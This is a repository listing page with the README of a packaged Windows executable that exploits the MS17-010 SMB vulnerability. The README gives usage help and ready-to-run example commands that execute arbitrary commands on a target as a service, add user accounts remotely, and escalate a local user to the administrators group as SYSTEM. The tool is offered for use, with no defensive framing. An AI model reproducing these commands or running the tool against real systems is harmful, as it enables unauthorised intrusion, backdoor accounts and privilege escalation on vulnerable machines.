https://github.com/irgoncalves/ms17-010

This contains a bundle with an executable to exploit ms17-010 remote or locally. It does not require Python.
https://github.com/irgoncalves/ms17-010

executable ms17-010 python

Last synced: 9 months ago
JSON representation

This contains a bundle with an executable to exploit ms17-010 remote or locally. It does not require Python.

• Host: GitHub
• URL: https://github.com/irgoncalves/ms17-010
• Owner: irgoncalves
• Created: 2019-01-10T00:26:00.000Z (over 7 years ago)
• Default Branch: master
• Last Pushed: 2019-01-10T22:18:35.000Z (over 7 years ago)
• Last Synced: 2025-08-18T07:36:47.211Z (10 months ago)
• Topics: executable, ms17-010, python
• Language: Python
• Homepage:
• Size: 9.91 MB
• Stars: 16
• Watchers: 0
• Forks: 6
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

          
# ms17-010

This is a modified version of the [Worawit Wang: GitHub](https://github.com/worawit/MS17-010/) zzz_exploit for MS17-010.


It implements a few options such as username/password specification and an arbitrary command to be executed.


It does not change anything related to the SMB exploitation


This is a bundle with an executable and dependencies and DOES NOT require python install.


Built with Pyinstaller.

# Usage

Unzip the bundle and from the command line execute ms17-010-zzz.exe



ms17-010-zzz.exe -h


usage: ms17-010-zzz.exe [-h] -t TARGET -c COMMAND -P PIPE [-u USER]

                        [-p PASSWORD]





MS17-010 - zzz_explot modified and converted to binary https://github.com/irgoncalves/ms17-010





optional arguments:


  -h, --help            show this help message and exit


  -t TARGET, --target TARGET


                        Target for exploitation


  -c COMMAND, --command COMMAND


                        Command to be executed as a service


  -P PIPE, --pipe PIPE  Pipe to connect (e.g. netlogon)


  -u USER, --user USER  Username to authenticate in case no anomymous


                        connection to a pipe is allowed


  -p PASSWORD, --password PASSWORD


                        Password for the user





Example: ms17-010.exe -t 172.16.0.2 -c 'net user /add testusr teste123'





Example to add a user remotely connecting anonymously to a named pipe:


ms17-010-zzz.exe -t 10.128.1.208 -c "net user /add teste2 teste2123"





Example to add a user remotely specifying a named pipe and a valid non-administrator user:


ms17-010-zzz.exe -t 10.128.1.208 -c "net user /add teste2 teste2123" -P netlogon -u svruser -p abc123





Example to locally escalate privilege for an existent user (all commands are executed by SYSTEM):


ms17-010-zzz.exe -t 127.0.0.1 -c "net localgroup administrators teste2 /add" -P netlogon -u teste2 -p teste2123

# Limitations

Currently supports only x64 platform (Tested running from Windows 10, 2K8)